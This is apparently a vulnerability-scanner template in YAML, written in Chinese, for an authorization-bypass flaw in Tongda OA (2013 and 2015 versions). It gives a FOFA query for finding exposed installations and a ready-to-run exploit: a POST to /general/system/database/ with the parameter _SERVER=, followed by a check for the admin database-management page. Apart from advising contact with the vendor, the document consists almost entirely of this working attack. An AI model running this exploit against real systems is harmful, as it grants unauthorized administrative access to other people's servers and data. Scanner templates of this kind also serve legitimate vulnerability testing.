product: 通达OA
vName: 通达OA 越权访问
type: 访问控制
vID: [ ]
level: 3
vDesc: 将get型访问转换成post,并且post参数_SERVER,即可越权访问admin才能访问的⻚面。根据⽹上的通达 OA的源码找这些敏感地址,如： /general/system/database/
version: 2013、2015版本
note: ''
search:
  FOFA: app="TDXK-通达OA"
protocol: http
link: https://www.hacking8.com/bug-web/通达oa/通达oa-越权访问.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /general/system/database/
      data: _SERVER=
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - 数据库管理
            logic: and